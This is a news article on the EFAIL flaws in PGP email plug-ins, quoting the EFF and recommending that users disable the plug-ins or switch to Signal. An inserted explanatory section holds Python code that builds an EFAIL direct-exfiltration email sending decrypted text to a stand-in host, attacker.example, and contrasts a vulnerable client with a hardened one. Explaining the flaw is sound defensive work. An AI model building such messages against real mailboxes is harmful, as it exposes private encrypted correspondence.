If You Use PGP Encryption, You Should Probably Stop


Whooooooops!! If you use PGP encryption to protect your email, you might want to disable it for the time being. A team of European researchers has discovered a set of vulnerabilities, which they are calling “EFAIL,” that “might reveal the plaintext of encrypted emails, including encrypted emails sent in the past.” For now, the researchers and the Electronic Frontier Foundation are recommending that users disable the PGP plug-ins for popular email clients like Thunderbird and Apple Mail.

PGP (Pretty Good Privacy) is a popular encryption scheme in which a sender encrypts an email to the recipient’s public key, and only the holder of the matching private key can decrypt it. Email client plug-ins make that decryption automatic, and an attacker can abuse the automatic decryption together with the way mail clients render HTML email (essentially as a web page, including fetching remote content such as images) to smuggle the decrypted text out to a server the attacker controls.

From the EFF:

The first attack is a “direct exfiltration” attack that is caused by the details of how mail clients choose to display HTML to the user. The attacker crafts a message that includes the old encrypted message. The new message is constructed in such a way that the mail software displays the entire decrypted message — including the captured ciphertext — as unencrypted text. Then the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls.
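The mechanism described in the two paragraphs above, as an added example that is not part of this article, the EFF’s write-up, or the EFAIL researchers’ own code: the attacker builds a multipart message that sandwiches the stolen ciphertext between an HTML part containing an unclosed `<img src="` attribute and a part containing the closing `">`. A client that decrypts the middle part in place and renders all parts as one HTML document ends up with the plaintext inside the image URL, which its HTML engine then fetches. Everything here is constructed: the host `attacker.example`, the message contents, and the “ciphertext,” which `fake_decrypt` turns back into plaintext by a lookup rather than real OpenPGP, because the flaw being shown is in the HTML handling, not the cryptography.

```python
import email
from email import policy
from html.parser import HTMLParser

# Constructed values for the demo; none of these are real.
ATTACKER_URL = "https://attacker.example/collect?d="
ORIGINAL_PLAINTEXT = "Meet at the safehouse at 21:00. Passphrase: tangerine"
CAPTURED_CIPHERTEXT = (
    "-----BEGIN PGP MESSAGE-----\n"
    "CONSTRUCTED-STAND-IN-FOR-A-REAL-PGP-BLOCK\n"
    "-----END PGP MESSAGE-----"
)


def fake_decrypt(armored: str) -> str:
    """Stand-in for the victim's plug-in handing a block to gpg. No real
    OpenPGP here: it only recognises the one constructed ciphertext above."""
    if armored.strip().splitlines() == CAPTURED_CIPHERTEXT.splitlines():
        return ORIGINAL_PLAINTEXT
    return armored


def build_efail_message(captured_ciphertext: str) -> str:
    """Attacker side of the direct-exfiltration attack: the stolen ciphertext
    is placed between an HTML part that opens an <img src=" attribute and an
    HTML part that closes it, so the decrypted text lands inside the URL."""
    boundary = "efail-demo-boundary"
    parts = [
        ("text/html", '<img src="' + ATTACKER_URL),
        ("application/pgp-encrypted", captured_ciphertext),
        ("text/html", '">'),
    ]
    lines = [
        "From: attacker@attacker.example",
        "To: victim@example.org",
        "Subject: Re: meeting",
        "MIME-Version: 1.0",
        f'Content-Type: multipart/mixed; boundary="{boundary}"',
        "",
    ]
    for ctype, body in parts:
        lines += [f"--{boundary}", f"Content-Type: {ctype}", "", body]
    lines.append(f"--{boundary}--")
    return "\r\n".join(lines)


class RemoteLoadCollector(HTMLParser):
    """Records every <img src=...> URL a renderer with remote loading on would fetch."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.urls.append(value)


def remote_loads(html: str) -> list:
    parser = RemoteLoadCollector()
    parser.feed(html)
    parser.close()
    return parser.urls


def vulnerable_client(raw_message: str) -> list:
    """Models the flawed behaviour: decrypt each PGP part in place, then hand the
    concatenation of every part to a single HTML renderer that auto-loads images."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    document = ""
    for part in msg.walk():
        if part.is_multipart():
            continue
        body = part.get_payload()
        if part.get_content_type() == "application/pgp-encrypted":
            body = fake_decrypt(body)
        document += body
    return remote_loads(document)


def hardened_client(raw_message: str, load_remote: bool = False) -> list:
    """Mitigations: each MIME part is rendered as its own document, decrypted
    output is displayed as text and never parsed as HTML, and remote content
    is only fetched when the user explicitly opts in."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    urls = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_content_type() == "application/pgp-encrypted":
            fake_decrypt(part.get_payload())  # would be shown verbatim, not rendered
            continue
        if part.get_content_type() == "text/html" and load_remote:
            urls += remote_loads(part.get_payload())  # this part alone, no plaintext in it
    return urls


if __name__ == "__main__":
    raw = build_efail_message(CAPTURED_CIPHERTEXT)
    print("vulnerable client fetches:", vulnerable_client(raw))
    print("hardened client fetches:  ", hardened_client(raw))
```

Running it, the vulnerable client tries to load one image whose URL begins with `https://attacker.example/collect?d=` and ends with the full decrypted plaintext, which is exactly the exfiltration the EFF paragraph describes. The hardened client fetches nothing by default, and even with remote loading switched on it sees only an unclosed tag in the first part and a stray `">` in the last, because the decrypted text was never spliced into the same document. This is why turning off HTML rendering or remote content loading in the mail client blocks this particular path even before the plug-ins are fixed.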

While near-universal, email has also become a hodgepodge of different protocols and software, making it difficult to safeguard. Cryptography expert Kenn White compared the PGP vulnerability on Twitter to a broken muffler on a totaled car.

In the meantime, you might want to use a different piece of software for encrypted messaging until it gets sorted out. The totally free Signal is a good option, and the Signal Protocol that app uses is also built into other messaging apps, such as WhatsApp.
